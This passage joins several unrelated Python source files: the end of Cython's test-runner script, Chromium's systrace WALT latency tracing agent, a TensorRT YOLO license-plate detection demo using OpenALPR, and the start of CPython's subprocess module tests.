        CompilationOptions, \
        default_options as pyrex_default_options
    from Cython.Compiler.Options import _directive_defaults as directive_defaults
    from Cython.Compiler import Errors
    Errors.LEVEL = 0  # show all warnings
    from Cython.Compiler import Options
    Options.generate_cleanup_code = 3  # complete cleanup code
    from Cython.Compiler import DebugFlags
    # Keep comments about temps in the generated C code to ease debugging.
    DebugFlags.debug_temp_code_comments = 1
    pyrex_default_options['formal_grammar'] = options.use_formal_grammar
    if options.profile:
        # Enable profiling hooks in all compiled test modules.
        directive_defaults['profile'] = True
    if options.watermark:
        # Override the version watermark for deterministic generated output.
        import Cython.Compiler.Version
        Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
    """Emit whichever coverage reports (text, XML, HTML) were requested."""
    report_requests = (
        (options.coverage,
         lambda: coverage.report(show_missing=0)),
        (options.coverage_xml,
         lambda: coverage.xml_report(outfile="coverage-report.xml")),
        (options.coverage_html,
         lambda: coverage.html_report(directory="coverage-report-html")),
    )
    for requested, emit_report in report_requests:
        if requested:
            emit_report()
def runtests_callback(args):
    """Worker adapter for multiprocessing.Pool.

    Unpacks an (options, cmd_args, shard_num) tuple, stamps the shard number
    onto the options object and runs that single shard.
    """
    shard_options, shard_cmd_args, shard_num = args
    shard_options.shard_num = shard_num
    return runtests(shard_options, shard_cmd_args)
def runtests(options, cmd_args, coverage=None):
    """Build and run the test suite for one shard (or the whole run).

    Returns an (shard_num, stats, return_code) tuple so results can be
    aggregated by the sharded parent process.
    """
    WITH_CYTHON = options.with_cython
    ROOTDIR = os.path.abspath(options.root_dir)
    WORKDIR = os.path.abspath(options.work_dir)
    if WITH_CYTHON:
        configure_cython(options)
    xml_output_dir = options.xml_output_dir
    if options.shard_num > -1:
        # Give every shard its own work dir and XML output dir.
        WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
        if xml_output_dir:
            xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
    # RUN ALL TESTS!
    UNITTEST_MODULE = "Cython"
    UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
    if WITH_CYTHON:
        # Clear out stale build artefacts, but keep the refnanny build dir
        # ("support") and "Cy3".
        if os.path.exists(WORKDIR):
            for path in os.listdir(WORKDIR):
                if path in ("support", "Cy3"): continue
                shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
    if not os.path.exists(WORKDIR):
        os.makedirs(WORKDIR)
    # Only the parent process / first shard prints the environment banner.
    if options.shard_num <= 0:
        sys.stderr.write("Python %s\n" % sys.version)
        sys.stderr.write("\n")
        if WITH_CYTHON:
            sys.stderr.write("Running tests against Cython %s\n" % get_version())
        else:
            sys.stderr.write("Running tests without Cython.\n")
    if options.for_debugging:
        # Keep build output around and stay in-process so gdb can attach.
        options.cleanup_workdir = False
        options.cleanup_sharedlibs = False
        options.fork = False
        if WITH_CYTHON and include_debugger:
            from Cython.Compiler.Options import default_options as compiler_default_options
            compiler_default_options['gdb_debug'] = True
            compiler_default_options['output_dir'] = os.getcwd()
    if IS_PYPY:
        if options.with_refnanny:
            sys.stderr.write("Disabling refnanny in PyPy\n")
            options.with_refnanny = False
    if options.with_refnanny:
        # Build the refnanny extension and enable reference-count tracking.
        from pyximport.pyxbuild import pyx_to_dll
        libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
                             build_in_temp=True,
                             pyxbuild_dir=os.path.join(WORKDIR, "support"))
        sys.path.insert(0, os.path.split(libpath)[0])
        CFLAGS.append("-DCYTHON_REFNANNY=1")
    if options.limited_api:
        CFLAGS.append("-DCYTHON_LIMITED_API=1")
    if xml_output_dir and options.fork:
        # doesn't currently work together
        sys.stderr.write("Disabling forked testing to support XML test output\n")
        options.fork = False
    if WITH_CYTHON:
        sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
    # Decide whether known-bug tests are included in this run.
    test_bugs = False
    if options.tickets:
        for ticket_number in options.tickets:
            test_bugs = True
            cmd_args.append('ticket:%s' % ticket_number)
    if not test_bugs:
        for selector in cmd_args:
            if selector.startswith('bugs'):
                test_bugs = True
    # Build inclusion selectors from the command line (match everything if none).
    selectors = [ string_selector(r) for r in cmd_args ]
    verbose_excludes = selectors or options.verbosity >= 2
    if not selectors:
        selectors = [ lambda x, tags=None: True ]
    # Check which external modules are not present and exclude tests
    # which depends on them (by prefix)
    missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
    version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
    exclude_selectors = [missing_dep_excluder, version_dep_excluder]  # want to print msg at exit
    try:
        import IPython.core.release
        if list(IPython.core.release._ver) < [1, 0, 0]:
            raise ImportError
    except (ImportError, AttributeError, TypeError):
        exclude_selectors.append(RegExSelector('IPython'))
    try:
        # NOTE: deliberate raise — Jedi tests are disabled unconditionally.
        raise ImportError("Jedi typer is currently broken, see GH#1845")
        import jedi
        if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
            raise ImportError
    except (ImportError, AttributeError, TypeError):
        exclude_selectors.append(RegExSelector('Jedi'))
    if options.exclude:
        exclude_selectors += [ string_selector(r) for r in options.exclude ]
    if not COMPILER_HAS_INT128 or not IS_CPYTHON:
        exclude_selectors += [RegExSelector('int128')]
    if options.shard_num > -1:
        # Partition the test set across shards by excluding non-local tests.
        exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
    if not test_bugs:
        # Exclude tests listed in the platform-relevant known-bug files.
        bug_files = [
            ('bugs.txt', True),
            ('pypy_bugs.txt', IS_PYPY),
            ('limited_api_bugs.txt', options.limited_api),
            ('windows_bugs.txt', sys.platform == 'win32'),
            ('cygwin_bugs.txt', sys.platform == 'cygwin')
        ]
        exclude_selectors += [
            FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
                             verbose=verbose_excludes)
            for bugs_file_name, condition in bug_files if condition
        ]
    global COMPILER
    if options.compiler:
        COMPILER = options.compiler
    # Resolve the requested backends ('c', 'cpp', ...) into the final list.
    selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
    backends = []
    for backend in selected_backends:
        if backend == 'c' and not options.use_c:
            continue
        elif backend == 'cpp' and not options.use_cpp:
            continue
        elif backend not in BACKENDS:
            sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
                backend, ','.join(BACKENDS)))
            sys.exit(1)
        backends.append(backend)
    if options.shard_num <= 0:
        sys.stderr.write("Backends: %s\n" % ','.join(backends))
    languages = backends
    if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
        bugs_file_name = 'travis_macos_cpp_bugs.txt'
        exclude_selectors += [
            FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
                             verbose=verbose_excludes)
        ]
    if options.use_common_utility_dir:
        # Share generated utility code between tests to speed up compilation.
        common_utility_dir = os.path.join(WORKDIR, 'utility_code')
        if not os.path.exists(common_utility_dir):
            os.makedirs(common_utility_dir)
    else:
        common_utility_dir = None
    sys.stderr.write("\n")
    # Assemble the unittest suite from the selected test categories.
    test_suite = unittest.TestSuite()
    stats = Stats()
    if options.unittests:
        collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
    if options.doctests:
        collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
    if options.filetests and languages:
        filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
                                options, options.pyregr, languages, test_bugs,
                                options.language_level, common_utility_dir,
                                options.pythran_dir, add_embedded_test=True, stats=stats)
        test_suite.addTest(filetests.build_suite())
    if options.examples and languages:
        # Compile the documentation examples as additional tests.
        for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
            filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
                                    options, options.pyregr, languages, test_bugs,
                                    options.language_level, common_utility_dir,
                                    options.pythran_dir,
                                    default_mode='compile', stats=stats)
            test_suite.addTest(filetests.build_suite())
    if options.system_pyregr and languages:
        # Optionally include CPython's own regression tests, compiled by Cython.
        sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
        if not os.path.isdir(sys_pyregr_dir):
            sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test')  # source build
        if os.path.isdir(sys_pyregr_dir):
            filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
                                    options, True, languages, test_bugs,
                                    sys.version_info[0], common_utility_dir, stats=stats)
            sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
            test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
    if options.code_style and options.shard_num <= 0:
        try:
            import pycodestyle
        except ImportError:
            # Hack to make the exclusion visible.
            missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
        else:
            test_suite.addTest(TestCodeFormat(options.cython_dir))
    # Pick the runner: XML output (for CI) or plain text.
    if xml_output_dir:
        from Cython.Tests.xmlrunner import XMLTestRunner
        if not os.path.exists(xml_output_dir):
            try:
                os.makedirs(xml_output_dir)
            except OSError:
                pass  # concurrency issue?
        test_runner = XMLTestRunner(output=xml_output_dir,
                                    verbose=options.verbosity > 0)
        if options.failfast:
            sys.stderr.write("--failfast not supported with XML runner\n")
    else:
        text_runner_options = {}
        if options.failfast:
            text_runner_options['failfast'] = True
        test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
    if options.pyximport_py:
        from pyximport import pyximport
        pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
                          load_py_module_on_import_failure=True, inplace=True)
    try:
        # Surface uncollectable garbage created by tests.
        gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
    except AttributeError:
        pass  # not available on PyPy
    result = test_runner.run(test_suite)
    if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
        shutil.rmtree(common_utility_dir)
    if missing_dep_excluder.tests_missing_deps:
        sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
        for test in missing_dep_excluder.tests_missing_deps:
            sys.stderr.write("   %s\n" % test)
    if options.with_refnanny:
        # Dump any reference-count log entries collected by refnanny.
        import refnanny
        sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
    if options.exit_ok:
        return options.shard_num, stats, 0
    else:
        return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
    try:
        main()
    except Exception:
        # Report the failure, then make sure lingering daemon threads cannot
        # keep the process alive before exiting non-zero.
        traceback.print_exc()
        try:
            check_thread_termination(ignore_seen=False)
        except PendingThreadsError:
            # normal program exit won't kill the threads, do it the hard way here
            flush_and_terminate(1)
        sys.exit(1)
|
walt_agent.py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import threading
import py_utils
from devil.android import device_utils
from systrace import trace_result
from systrace import tracing_agents
from py_trace_event import trace_time as trace_time_module
# Location on the device where the WALT app writes its trace output.
TRACE_FILE_PATH = \
    '/sdcard/Android/data/org.chromium.latency.walt/files/trace.txt'
# Header line identifying the clock domain of the collected trace.
CLOCK_DOMAIN_MARKER = '# clock_type=LINUX_CLOCK_MONOTONIC\n'
def try_create_agent(options):
    """Return a WaltAgent when WALT tracing was requested, else None."""
    if not options.is_walt_enabled:
        return None
    return WaltAgent()
class WaltConfig(tracing_agents.TracingConfig):
    # Value object holding the WALT-related command-line settings.
    def __init__(self, device_serial_number, is_walt_enabled):
        tracing_agents.TracingConfig.__init__(self)
        # Serial number of the Android device to trace.
        self.device_serial_number = device_serial_number
        # True when the user passed --walt on the command line.
        self.is_walt_enabled = is_walt_enabled
def add_options(parser):
    """Register the WALT-specific command-line options and return the group."""
    group = optparse.OptionGroup(parser, 'WALT trace options')
    walt_help = ('Use the WALT tracing agent. '
                 'WALT is a device for measuring latency of physical '
                 'sensors on phones and computers. '
                 'See https://github.com/google/walt')
    group.add_option('--walt', dest='is_walt_enabled', default=False,
                     action='store_true', help=walt_help)
    return group
def get_config(options):
    # Build a WaltConfig value object from the parsed command-line options.
    return WaltConfig(options.device_serial_number, options.is_walt_enabled)
class WaltAgent(tracing_agents.TracingAgent):
    """
    This tracing agent requires the WALT app to be installed on the Android phone,
    and requires the WALT device to be attached to the phone. WALT is a device
    for measuring latency of physical sensors and outputs on phones and
    computers. For more information, visit https://github.com/google/walt
    """

    def __init__(self):
        super(WaltAgent, self).__init__()
        # Raw trace text pulled off the device (set by _collect_trace_data).
        self._trace_contents = None
        # WaltConfig instance, set in StartAgentTracing.
        self._config = None
        self._device_utils = None
        # ftrace-style clock sync line, appended to the trace in GetResults.
        self._clock_sync_marker = None
        # Background thread that reads the trace file after tracing stops.
        self._collection_thread = None

    def __repr__(self):
        return 'WaltAgent'

    @py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
    def StartAgentTracing(self, config, timeout=None):
        del timeout  # unused
        self._config = config
        self._device_utils = device_utils.DeviceUtils(
            self._config.device_serial_number)
        if self._device_utils.PathExists(TRACE_FILE_PATH):
            # clear old trace events so they are not included in the current trace
            self._device_utils.WriteFile(TRACE_FILE_PATH, '')
        return True

    @py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
    def StopAgentTracing(self, timeout=None):
        """Stops tracing and starts collecting results.

        To synchronously retrieve the results after calling this function,
        call GetResults().
        """
        del timeout  # unused
        # Collection happens on a thread so StopAgentTracing returns quickly;
        # GetResults() joins the thread before reading the contents.
        self._collection_thread = threading.Thread(
            target=self._collect_trace_data)
        self._collection_thread.start()
        return True

    def _collect_trace_data(self):
        # Runs on the collection thread; stores the on-device trace file text.
        self._trace_contents = self._device_utils.ReadFile(TRACE_FILE_PATH)

    def SupportsExplicitClockSync(self):
        return True

    def RecordClockSyncMarker(self, sync_id, did_record_clock_sync_callback):
        # /proc/timer_list is expected to contain a line like
        # "now at <nsec> nsecs"; field index 2 is the timestamp.
        # NOTE(review): assumes that output format — confirm on target kernels.
        cmd = 'cat /proc/timer_list | grep now'
        t1 = trace_time_module.Now()
        command_result = self._device_utils.RunShellCommand(cmd, shell=True)
        nsec = command_result[0].split()[2]
        self._clock_sync_marker = format_clock_sync_marker(sync_id, nsec)
        did_record_clock_sync_callback(t1, sync_id)

    @py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
    def GetResults(self, timeout=None):
        del timeout  # unused
        # Wait for the background read started by StopAgentTracing to finish.
        self._collection_thread.join()
        self._collection_thread = None
        return trace_result.TraceResult('waltTrace', self._get_trace_result())

    def _get_trace_result(self):
        # Prepend the ftrace header and clock-domain marker; append the clock
        # sync line if one was recorded.
        result = '# tracer: \n' + CLOCK_DOMAIN_MARKER + self._trace_contents
        if self._clock_sync_marker is not None:
            result += self._clock_sync_marker
        return result
def format_clock_sync_marker(sync_id, nanosec_time):
    """Return an ftrace-formatted clock sync marker line.

    *nanosec_time* is a nanosecond timestamp (string or number); it is
    converted to seconds for the marker.
    """
    seconds = float(nanosec_time) / 1e9
    prefix = '<0>-0     (-----) [001] ...1  '
    event = ': tracing_mark_write: trace_event_clock_sync: name='
    return prefix + str(seconds) + event + sync_id + '\n'
|
trt_yolo.py | """trt_yolo.py
This script demonstrates how to do real-time object detection with
TensorRT optimized YOLO engine.
"""
import os
import time
import argparse
import cv2
import pycuda.autoinit # This is needed for initializing CUDA driver
import threading
import json
from utils.yolo_classes import get_cls_dict
from utils.camera import add_camera_args, Camera
from utils.display import open_window, set_display, show_fps
from utils.visualization import BBoxVisualization
from utils.yolo_with_plugins import TrtYOLO
from utils.crop_image import crop_image
from utils.svm_extract import extract_text
# from utils.alpr import detect
from utils.openalpr import Alpr
# Name of the display window (referenced by the commented-out open_window call).
WINDOW_NAME = 'TrtYOLODemo'
# Directory for cropped license-plate images.  NOTE(review): hard-coded
# absolute path — presumably machine-specific; confirm before reuse.
IMG_CROP_DIR = r'/home/john/Projects/tensorrt_demos/crop/'
def parse_args():
    """Parse input arguments."""
    desc = ('Capture and display live camera video, while doing '
            'real-time object detection with TensorRT optimized '
            'YOLO model on Jetson')
    arg_parser = argparse.ArgumentParser(description=desc)
    # The camera module contributes its own source-selection options.
    arg_parser = add_camera_args(arg_parser)
    arg_parser.add_argument(
        '-c', '--category_num', type=int, default=80,
        help='number of object categories [80]')
    arg_parser.add_argument(
        '-t', '--conf_thresh', type=float, default=0.3,
        help='set the detection confidence threshold')
    arg_parser.add_argument(
        '-m', '--model', type=str, required=True,
        help=('[yolov3-tiny|yolov3|yolov3-spp|yolov4-tiny|yolov4|'
              'yolov4-csp|yolov4x-mish]-[{dimension}], where '
              '{dimension} could be either a single number (e.g. '
              '288, 416, 608) or 2 numbers, WxH (e.g. 416x256)'))
    arg_parser.add_argument(
        '-l', '--letter_box', action='store_true',
        help='inference with letterboxed image [False]')
    return arg_parser.parse_args()
def alpr_detect(alpr, img):
    """Run OpenALPR plate recognition on *img* and print any results as JSON."""
    recognition = alpr.recognize_ndarray(img)
    results = recognition['results']
    if results != []:
        print(json.dumps(results, indent=4, sort_keys=True))
def loop_and_detect(alpr, cam, trt_yolo, conf_th, vis):
    """Continuously capture images from camera and do object detection.

    # Arguments
      alpr: the OpenALPR recognizer instance.
      cam: the camera instance (video source).
      trt_yolo: the TRT YOLO object detector instance.
      conf_th: confidence/score threshold for object detection.
      vis: for visualization.
    """
    isCropped = False
    full_scrn = False
    fps = 0.0
    tic = time.time()
    plate_num = ''
    while True:
        if isCropped == False:
            img = cam.read()
            if img is None:
                # camera ran dry (end of stream / disconnect)
                break
            boxes, confs, clss = trt_yolo.detect(img, conf_th)
            # Class id 0 is 'license-plate' (see cls_dict in main()).
            for idx, id in enumerate(clss):
                if id == 0:
                    cropped_img, dilation, thresh = crop_image(
                        img, boxes, idx, mBlur=3, gBlur=(5, 5))
                    # t = threading.Thread(
                    #     target=alpr_detect, args=(alpr, cropped_img,))
                    # t.start()
                    alpr_detect(alpr, cropped_img)
                    #alpr_detect(alpr, img)
            toc = time.time()
            img = vis.draw_bboxes(img, boxes, confs, clss)
            img = show_fps(img, fps)
            cv2.imshow('cam', img)
            # Exponentially smoothed FPS estimate.
            curr_fps = 1.0 / (toc - tic)
            fps = curr_fps if fps == 0.0 else (fps*0.95 + curr_fps*0.05)
            tic = toc
            key = cv2.waitKey(1)
            if key == 27:
                # ESC pressed: exit the capture loop
                break
            # isCropped = False
def main():
    # Entry point: validate arguments, build the detector and recognizer,
    # then run the capture/detect loop until the user quits.
    args = parse_args()
    if args.category_num <= 0:
        raise SystemExit('ERROR: bad category_num (%d)!' % args.category_num)
    if not os.path.isfile('yolo/%s.trt' % args.model):
        raise SystemExit('ERROR: file (yolo/%s.trt) not found!' % args.model)
    cam = Camera(args)
    if not cam.isOpened():
        raise SystemExit('ERROR: failed to open camera!')
    # cls_dict = get_cls_dict(args.category_num)
    # Custom two-class model instead of the default COCO classes.
    cls_dict = {0: 'license-plate', 1: 'vehicle'}
    vis = BBoxVisualization(cls_dict)
    trt_yolo = TrtYOLO(args.model, args.category_num, args.letter_box)
    alpr = Alpr("us", "/usr/share/openalpr/runtime_data/config/us.conf",
                "/usr/share/openalpr/runtime_data")
    if not alpr.is_loaded():
        print("Error loading OpenALPR")
    else:
        print("Using OpenALPR " + alpr.get_version())
    # Only keep the single best plate candidate per detection.
    alpr.set_top_n(1)
    # alpr.set_default_region("wa")
    alpr.set_detect_region(False)
    # open_window(
    #     WINDOW_NAME, 'Camera TensorRT YOLO Demo',
    #     cam.img_width, cam.img_height)
    loop_and_detect(alpr, cam, trt_yolo, args.conf_thresh, vis=vis)
    cam.release()
    cv2.destroyAllWindows()
    alpr.unload()
if __name__ == '__main__':
    # Run the demo only when executed as a script, not on import.
    main()
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import gc
import textwrap
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import threading
except ImportError:
threading = None
# Skip the whole module during PGO training runs; spawning many child
# processes is not useful profiling input.
if support.PGO:
    raise unittest.SkipTest("test is not helpful for PGO")

mswindows = (sys.platform == "win32")

#
# Depends on the following external programs: Python
#

if mswindows:
    # Code snippet prepended to child programs that must write binary data
    # to stdout without CRLF translation on Windows.
    SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
                 'os.O_BINARY);')
else:
    SETBINARY = ''
class BaseTestCase(unittest.TestCase):
    # Common setup/teardown and helpers shared by the subprocess test cases.

    def setUp(self):
        # Try to minimize the number of children we have so this test
        # doesn't crash on some buildbots (Alphas in particular).
        support.reap_children()

    def tearDown(self):
        # Wait on any children still tracked by the module's internal
        # bookkeeping list, then verify the list was fully drained.
        for inst in subprocess._active:
            inst.wait()
        subprocess._cleanup()
        self.assertFalse(subprocess._active, "subprocess._active not empty")

    def assertStderrEqual(self, stderr, expected, msg=None):
        # In a debug build, stuff like "[6580 refs]" is printed to stderr at
        # shutdown time. That frustrates tests trying to check stderr produced
        # from a spawned Python process.
        actual = support.strip_python_stderr(stderr)
        # strip_python_stderr also strips whitespace, so we do too.
        expected = expected.strip()
        self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
    """Exception deliberately raised by Popen test doubles in this module."""
class PopenExecuteChildRaises(subprocess.Popen):
    """Popen subclass whose child spawn always fails.

    Used to verify that subprocess.PIPE filehandles are cleaned up when
    _execute_child raises.
    """

    def _execute_child(self, *unused_args, **unused_kwargs):
        raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):

    def test_io_buffered_by_default(self):
        p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
                             stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        try:
            # Without an explicit bufsize, all three pipes must be buffered.
            self.assertIsInstance(p.stdin, io.BufferedIOBase)
            self.assertIsInstance(p.stdout, io.BufferedIOBase)
            self.assertIsInstance(p.stderr, io.BufferedIOBase)
        finally:
            p.stdin.close()
            p.stdout.close()
            p.stderr.close()
            p.wait()

    def test_io_unbuffered_works(self):
        p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
                             stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE, bufsize=0)
        try:
            # bufsize=0 must expose the raw, unbuffered pipe objects.
            self.assertIsInstance(p.stdin, io.RawIOBase)
            self.assertIsInstance(p.stdout, io.RawIOBase)
            self.assertIsInstance(p.stderr, io.RawIOBase)
        finally:
            p.stdin.close()
            p.stdout.close()
            p.stderr.close()
            p.wait()
    def test_call_seq(self):
        # call() function with sequence argument; returns the child's exit code.
        rc = subprocess.call([sys.executable, "-c",
                              "import sys; sys.exit(47)"])
        self.assertEqual(rc, 47)

    def test_call_timeout(self):
        # call() function with timeout argument; we want to test that the child
        # process gets killed when the timeout expires. If the child isn't
        # killed, this call will deadlock since subprocess.call waits for the
        # child.
        self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
                          [sys.executable, "-c", "while True: pass"],
                          timeout=0.1)

    def test_check_call_zero(self):
        # check_call() function with zero return code
        rc = subprocess.check_call([sys.executable, "-c",
                                    "import sys; sys.exit(0)"])
        self.assertEqual(rc, 0)

    def test_check_call_nonzero(self):
        # check_call() function with non-zero return code raises, with the
        # exit status available on the exception.
        with self.assertRaises(subprocess.CalledProcessError) as c:
            subprocess.check_call([sys.executable, "-c",
                                   "import sys; sys.exit(47)"])
        self.assertEqual(c.exception.returncode, 47)
    def test_check_output(self):
        # check_output() function with zero return code
        output = subprocess.check_output(
                [sys.executable, "-c", "print('BDFL')"])
        self.assertIn(b'BDFL', output)

    def test_check_output_nonzero(self):
        # check_call() function with non-zero return code
        with self.assertRaises(subprocess.CalledProcessError) as c:
            subprocess.check_output(
                    [sys.executable, "-c", "import sys; sys.exit(5)"])
        self.assertEqual(c.exception.returncode, 5)

    def test_check_output_stderr(self):
        # check_output() function stderr redirected to stdout
        output = subprocess.check_output(
                [sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
                stderr=subprocess.STDOUT)
        self.assertIn(b'BDFL', output)

    def test_check_output_stdin_arg(self):
        # check_output() can be called with stdin set to a file
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        tf.write(b'pear')
        tf.seek(0)
        output = subprocess.check_output(
                [sys.executable, "-c",
                 "import sys; sys.stdout.write(sys.stdin.read().upper())"],
                stdin=tf)
        self.assertIn(b'PEAR', output)

    def test_check_output_input_arg(self):
        # check_output() can be called with input set to a string
        output = subprocess.check_output(
                [sys.executable, "-c",
                 "import sys; sys.stdout.write(sys.stdin.read().upper())"],
                input=b'pear')
        self.assertIn(b'PEAR', output)

    def test_check_output_stdout_arg(self):
        # check_output() refuses to accept 'stdout' argument
        with self.assertRaises(ValueError) as c:
            output = subprocess.check_output(
                    [sys.executable, "-c", "print('will not be run')"],
                    stdout=sys.stdout)
            # unreachable if check_output raised as expected
            self.fail("Expected ValueError when stdout arg supplied.")
        self.assertIn('stdout', c.exception.args[0])

    def test_check_output_stdin_with_input_arg(self):
        # check_output() refuses to accept 'stdin' with 'input'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        tf.write(b'pear')
        tf.seek(0)
        with self.assertRaises(ValueError) as c:
            output = subprocess.check_output(
                    [sys.executable, "-c", "print('will not be run')"],
                    stdin=tf, input=b'hare')
            # unreachable if check_output raised as expected
            self.fail("Expected ValueError when stdin and input args supplied.")
        self.assertIn('stdin', c.exception.args[0])
        self.assertIn('input', c.exception.args[0])

    def test_check_output_timeout(self):
        # check_output() function with timeout arg
        with self.assertRaises(subprocess.TimeoutExpired) as c:
            output = subprocess.check_output(
                    [sys.executable, "-c",
                     "import sys, time\n"
                     "sys.stdout.write('BDFL')\n"
                     "sys.stdout.flush()\n"
                     "time.sleep(3600)"],
                    # Some heavily loaded buildbots (sparc Debian 3.x) require
                    # this much time to start and print.
                    timeout=3)
            self.fail("Expected TimeoutExpired.")
        self.assertEqual(c.exception.output, b'BDFL')
    def test_call_kwargs(self):
        # call() function with keyword args; the child exits with the truth
        # value (1) of the env-var comparison.
        newenv = os.environ.copy()
        newenv["FRUIT"] = "banana"
        rc = subprocess.call([sys.executable, "-c",
                              'import sys, os;'
                              'sys.exit(os.getenv("FRUIT")=="banana")'],
                             env=newenv)
        self.assertEqual(rc, 1)

    def test_invalid_args(self):
        # Popen() called with invalid arguments should raise TypeError
        # but Popen.__del__ should not complain (issue #12085)
        with support.captured_stderr() as s:
            self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
            argcount = subprocess.Popen.__init__.__code__.co_argcount
            too_many_args = [0] * (argcount + 1)
            self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
        # Nothing may have been written to stderr by __del__.
        self.assertEqual(s.getvalue(), '')
    def test_stdin_none(self):
        # .stdin is None when not redirected
        p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        p.wait()
        self.assertEqual(p.stdin, None)

    def test_stdout_none(self):
        # .stdout is None when not redirected, and the child's stdout will
        # be inherited from the parent. In order to test this we run a
        # subprocess in a subprocess:
        # this_test
        #   \-- subprocess created by this test (parent)
        #          \-- subprocess created by the parent subprocess (child)
        # The parent doesn't specify stdout, so the child will use the
        # parent's stdout. This test checks that the message printed by the
        # child goes to the parent stdout. The parent also checks that the
        # child's stdout is None. See #11963.
        code = ('import sys; from subprocess import Popen, PIPE;'
                'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
                ' stdin=PIPE, stderr=PIPE);'
                'p.wait(); assert p.stdout is None;')
        p = subprocess.Popen([sys.executable, "-c", code],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        out, err = p.communicate()
        self.assertEqual(p.returncode, 0, err)
        self.assertEqual(out.rstrip(), b'test_stdout_none')

    def test_stderr_none(self):
        # .stderr is None when not redirected
        p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
                             stdin=subprocess.PIPE, stdout=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stdin.close)
        p.wait()
        self.assertEqual(p.stderr, None)
    def _assert_python(self, pre_args, **kwargs):
        # Helper: spawn Python with the given leading argv and Popen kwargs,
        # asserting it ran (exit code 47 proves our snippet executed).
        # We include sys.exit() to prevent the test runner from hanging
        # whenever python is found.
        args = pre_args + ["import sys; sys.exit(47)"]
        p = subprocess.Popen(args, **kwargs)
        p.wait()
        self.assertEqual(47, p.returncode)

    def test_executable(self):
        # Check that the executable argument works.
        #
        # On Unix (non-Mac and non-Windows), Python looks at args[0] to
        # determine where its standard library is, so we need the directory
        # of args[0] to be valid for the Popen() call to Python to succeed.
        # See also issue #16170 and issue #7774.
        doesnotexist = os.path.join(os.path.dirname(sys.executable),
                                    "doesnotexist")
        self._assert_python([doesnotexist, "-c"], executable=sys.executable)

    def test_executable_takes_precedence(self):
        # Check that the executable argument takes precedence over args[0].
        #
        # Verify first that the call succeeds without the executable arg.
        pre_args = [sys.executable, "-c"]
        self._assert_python(pre_args)
        self.assertRaises((FileNotFoundError, PermissionError),
                          self._assert_python, pre_args,
                          executable="doesnotexist")

    @unittest.skipIf(mswindows, "executable argument replaces shell")
    def test_executable_replaces_shell(self):
        # Check that the executable argument replaces the default shell
        # when shell=True.
        self._assert_python([], executable=sys.executable, shell=True)
    # For use in the test_cwd* tests below.
    def _normalize_cwd(self, cwd):
